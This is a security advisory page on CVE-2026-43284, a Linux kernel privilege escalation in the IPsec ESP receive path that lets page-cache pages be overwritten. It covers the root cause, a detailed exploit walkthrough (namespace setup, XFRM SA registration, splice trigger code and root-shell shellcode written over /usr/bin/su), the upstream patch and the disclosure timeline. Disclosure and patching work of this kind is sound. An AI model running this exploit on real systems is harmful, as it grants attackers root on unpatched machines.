Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/V4bel/dirtyfrag/llms.txt

Use this file to discover all available pages before exploring further.

The xfrm-ESP Page-Cache Write vulnerability is a kernel local privilege escalation (LPE) in the IPsec ESP receive path. When a splice()-planted page cache page lands in frag[0] of a non-linear skb, esp_input() skips the copy-on-write buffer allocation and runs AEAD decryption directly on the frag. A 4-byte sequence-number rearrangement step inside crypto_authenc_esn_decrypt() then writes attacker-chosen bytes permanently into the read-only page cache — even though authentication fails afterward. An unprivileged user who can create a user namespace can exploit this to overwrite the first 192 bytes of /usr/bin/su with a root-shell ELF and execute it.
CVE-2026-43284 was disclosed on 2026-04-30. The upstream fix landed on 2026-05-07 and was merged into mainline on 2026-05-08. Patch your kernel or apply the diff shown at the bottom of this page.

Root cause

Before performing in-place AEAD decryption on an ESP payload, esp_input() is supposed to call skb_cow_data() whenever the skb is non-linear, so that the frag data is copied into a private kernel buffer before any in-place modifications. The following branch creates a path that bypasses that copy:
esp4.c
static int esp_input(struct xfrm_state *x, struct sk_buff *skb)
{
        [...]

        if (!skb_cloned(skb)) {
                if (!skb_is_nonlinear(skb)) {    // <=[1]
                        nfrags = 1;

                        goto skip_cow;
                } else if (!skb_has_frag_list(skb)) {
                        nfrags = skb_shinfo(skb)->nr_frags;
                        nfrags++;

                        goto skip_cow;           // <=[2]
                }
        }

        err = skb_cow_data(skb, 0, &trailer);
At [1], the code correctly skips skb_cow_data when the skb is fully linear (no frags). The bug is the branch at [2]: when the skb is non-linear but has no frag_list, the code also jumps directly to skip_cow and performs in-place crypto on whatever page is sitting in frags[0]. If an attacker has pinned a read-only page cache page into that frag via splice, that page becomes both src and dst for the AEAD operation.

The 4-byte STORE

The write happens not during decryption itself but during a byte-rearrangement step inside crypto_authenc_esn_decrypt(). The ESP + ESN + authencesn(...) combination moves the high-order 32 bits of the sequence number to the end of the source SGL before passing it to the AEAD:
crypto/authencesn.c
static int crypto_authenc_esn_decrypt(struct aead_request *req)
{
        [...]

        /* Move high-order bits of sequence number to the end. */
        scatterwalk_map_and_copy(tmp, src, 0, 8, 0);
        if (src == dst) {
                scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
                scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);   // <=[3]
                dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
        [...]
The STORE at [3] writes 4 bytes at position assoclen + cryptlen within the destination SGL. You control exactly where that position falls by tuning the ESP payload length so that the page cache page occupies that offset. The 4 bytes written are the value of tmp + 1 — the high-order 32 bits of the ESP sequence number. Tracing the value back through esp_input_set_header():
net/ipv4/esp4.c
static void esp_input_set_header(struct sk_buff *skb, __be32 *seqhi)
{
        struct xfrm_state *x = xfrm_input_state(skb);
        struct ip_esp_hdr *esph;

        /* For ESN we move the header forward by 4 bytes to
         * accommodate the high bits.  We will move it back after
         * decryption.
         */
        if ((x->props.flags & XFRM_STATE_ESN)) {
                esph = skb_push(skb, 4);
                *seqhi = esph->spi;
                esph->spi = esph->seq_no;
                esph->seq_no = XFRM_SKB_CB(skb)->seq.input.hi;
        }
}
XFRM_SKB_CB(skb)->seq.input.hi is set from replay_esn->seq_hi, which you freely specify at SA registration time via the XFRMA_REPLAY_ESN_VAL netlink attribute. This gives you full control over both the location (file offset) and the value (4 bytes) of every STORE. AEAD authentication runs after the STORE and always returns -EBADMSG, but by then the page cache modification is permanent.
The STORE survives until the kernel evicts the page (e.g., via drop_caches or reboot). Every subsequent read() or mmap() of the affected file sees the modified bytes.

Privilege required

esp_input() is reached only when an XFRM SA is registered, which requires CAP_NET_ADMIN. You obtain that capability inside an unprivileged user namespace:
unshare(CLONE_NEWUSER | CLONE_NEWNET);
write_proc("/proc/self/setgroups", "deny");
write_proc("/proc/self/uid_map", "0 <real_uid> 1");
write_proc("/proc/self/gid_map", "0 <real_gid> 1");
ioctl(s, SIOCSIFFLAGS, &(struct ifreq){ .ifr_name="lo",
                                        .ifr_flags=IFF_UP|IFF_RUNNING });
The identity mapping (0 <real_uid> 1) means the process is root inside the new namespace and can register XFRM SAs within that netns.
On Ubuntu configurations where AppArmor blocks unprivileged user namespace creation, unshare(CLONE_NEWUSER) returns -EPERM and the ESP variant cannot run. See Chaining the two variants for how the RxRPC variant covers this blind spot.

Exploit overview

The target is /usr/bin/su. The exploit replaces the first 192 bytes (file offset 0) of its page cache with a static x86-64 root-shell ELF, leaving the setuid-root bit intact. The new ELF maps 0xb8 bytes at virtual address 0x400000 as R+X via a single PT_LOAD segment. The entry point is at 0x400078 (file offset 0x78). What the shellcode does at entry 0x400078:
// x86-64 shellcode at entry 0x400078
xor  edi, edi              // arg = 0
xor  esi, esi
xor  eax, eax
mov  al, 0x6a              // syscall: setgid(0)
syscall
mov  al, 0x69              // syscall: setuid(0)
syscall
mov  al, 0x74              // syscall: setgroups(0, NULL)
syscall
// ... execve("/bin/sh", NULL, ["TERM=xterm", NULL])
The 192 bytes are split into 48 × 4-byte chunks. Each chunk is written with one XFRM SA trigger.
1

Set up user + net namespace

Fork a child process, call unshare(CLONE_NEWUSER | CLONE_NEWNET), write identity uid/gid maps, and bring lo up with SIOCSIFFLAGS.
2

Register 48 XFRM SAs

Create one SA per 4-byte chunk. Each SA has a unique SPI (0xDEADBE10 + i), mode XFRM_MODE_TRANSPORT, flag XFRM_STATE_ESN, algorithm authencesn(hmac(sha256),cbc(aes)), UDP encap sport=dport=4500, and seq_hi set to the 4 bytes you want to write:
struct xfrm_replay_state_esn esn = {
    .bmp_len = 1, .seq = 100, .replay_window = 32,
    .seq_hi = patch_seqhi,        /* The 4 bytes that will be STOREd */
};
put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &esn, sizeof(esn) + 4);
3

Trigger each STORE with vmsplice + splice

For each chunk i, create a fresh sk_recv (bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP) and sk_send (connected to 127.0.0.1:4500). Build a 24-byte forged ESP wire header in a pipe with vmsplice, then splice 16 bytes from file offset i*4 of /usr/bin/su into the next pipe slot, and finally splice the pipe into sk_send:
uint8_t hdr[24];
*(uint32_t *)(hdr + 0) = htonl(spi);          /* per-chunk SPI */
*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);      /* wire seq_no_lo */
memset(hdr + 8, 0xCC, 16);                    /* IV (value irrelevant) */

vmsplice(pfd[1], &(struct iovec){hdr, 24}, 1, 0);
splice(file_fd, &(off_t){i*4}, pfd[1], NULL, 16, SPLICE_F_MOVE);
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
splice_to_socket() automatically sets MSG_SPLICE_PAGES, planting the page cache page P of /usr/bin/su directly into frag[0] of the sender skb.
4

Verify and execute

After all 48 triggers, read back bytes at file offset 0x78 and 0x79. If they are 0x31 and 0xff (the xor edi, edi at the shellcode entry), the patch succeeded. The parent process then executes /usr/bin/su - via forkpty + execve, which maps the modified page cache, gains euid=0 from the setuid bit, and runs the shellcode.

What the skb looks like on the receive side

After the splice, the skb that udp_rcv sees has this layout:
skb {
    head/linear: ESP_hdr(8) + IV(16)               // 24 bytes
    frags[0]:    { page=&P, off=i*4, size=16 }     // page cache page of /usr/bin/su
}

Call chain

udp_rcv(skb)
  xfrm4_udp_encap_rcv(sk, skb)
    xfrm_input(skb, IPPROTO_ESP, spi, 0)
      esp_input(x, skb)
        pskb_may_pull(skb, sizeof(esp_hdr) + ivlen)
        if (!skb_cloned(skb) && !skb_has_frag_list(skb))   // Vulnerable: frag(page=P) preserved
          goto skip_cow;
        esp_input_set_header(skb, seqhi)
          skb_push(skb, 4);
          esph->seq_no = XFRM_SKB_CB(skb)->seq.input.hi;   // seq_hi = patch_seqhi
        skb_to_sgvec(skb, sg, 0, skb->len)
        aead_request_set_crypt(req, sg, sg, elen+ivlen, iv) // src == dst → in-place
        crypto_aead_decrypt(req)
          crypto_authenc_esn_decrypt(req)
            scatterwalk_map_and_copy(tmp+1, dst, assoclen+cryptlen, 4, /*out=*/1)
              // 4-byte STORE: page P[i*4 .. i*4+3] = patch_seqhi
        return -EBADMSG                                     // ignored; STORE already done
The AEAD authentication result is always -EBADMSG because the exploit does not know the SA’s HMAC key. The error is ignored — the STORE has already been committed to the page cache by the time crypto_authenc_esn_decrypt returns.

Patch

The fix sets the SKBFL_SHARED_FRAG flag on page frags that arrive via splice in the IPv4/IPv6 datagram append paths. The skip-cow branch in esp_input / esp6_input then checks this flag and routes shared-frag skbs through skb_cow_data instead of operating on the attacker-pinned page directly.
diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
index 6dfc0bcde..6a5febbdb 100644
--- a/net/ipv4/esp4.c
+++ b/net/ipv4/esp4.c
@@ -873,7 +873,8 @@ static int esp_input(struct xfrm_state *x, struct sk_buff *skb)
 			nfrags = 1;
 
 			goto skip_cow;
-		} else if (!skb_has_frag_list(skb)) {
+		} else if (!skb_has_frag_list(skb) &&
+			   !skb_has_shared_frag(skb)) {
 			nfrags = skb_shinfo(skb)->nr_frags;
 			nfrags++;
 
diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index e4790cc7b..5bcd73cbd 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -1233,6 +1233,8 @@ static int __ip_append_data(struct sock *sk,
 			if (err < 0)
 				goto error;
 			copy = err;
+			if (!(flags & MSG_NO_SHARED_FRAGS))
+				skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;
 			wmem_alloc_delta += copy;
 		} else if (!zc) {
 			int i = skb_shinfo(skb)->nr_frags;
diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
index 9f7531373..9c06c5a14 100644
--- a/net/ipv6/esp6.c
+++ b/net/ipv6/esp6.c
@@ -915,7 +915,8 @@ static int esp6_input(struct xfrm_state *x, struct sk_buff *skb)
 			nfrags = 1;
 
 			goto skip_cow;
-		} else if (!skb_has_frag_list(skb)) {
+		} else if (!skb_has_frag_list(skb) &&
+			   !skb_has_shared_frag(skb)) {
 			nfrags = skb_shinfo(skb)->nr_frags;
 			nfrags++;
 
diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
index 7e92909ab..1f2a33fbe 100644
--- a/net/ipv6/ip6_output.c
+++ b/net/ipv6/ip6_output.c
@@ -1794,6 +1794,8 @@ static int __ip6_append_data(struct sock *sk,
 			if (err < 0)
 				goto error;
 			copy = err;
+			if (!(flags & MSG_NO_SHARED_FRAGS))
+				skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;
 			wmem_alloc_delta += copy;
 		} else if (!zc) {
 			int i = skb_shinfo(skb)->nr_frags;
The final merged patch uses the SKBFL_SHARED_FRAG approach submitted by Kuan-Ting Chen four days after the original patch. The commit is f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 in the netdev tree and mainline.

Disclosure timeline

Detailed information about the ESP vulnerability and a weaponized exploit were submitted to security@kernel.org. A patch was submitted to the netdev mailing list and the issue was made public.
Kuan-Ting Chen submitted an independent vulnerability report with a reproducer to security@kernel.org.
Kuan-Ting Chen submitted the SKBFL_SHARED_FRAG-based follow-up patch to the netdev mailing list.
The patch was merged into the netdev tree. Separately, an unrelated third party published the exploit publicly, breaking the linux-distros embargo. Full disclosure followed after agreement from distribution maintainers.
Commit f4c50a4034e6 was merged into mainline. CVE-2026-43284 was assigned.

Build docs developers (and LLMs) love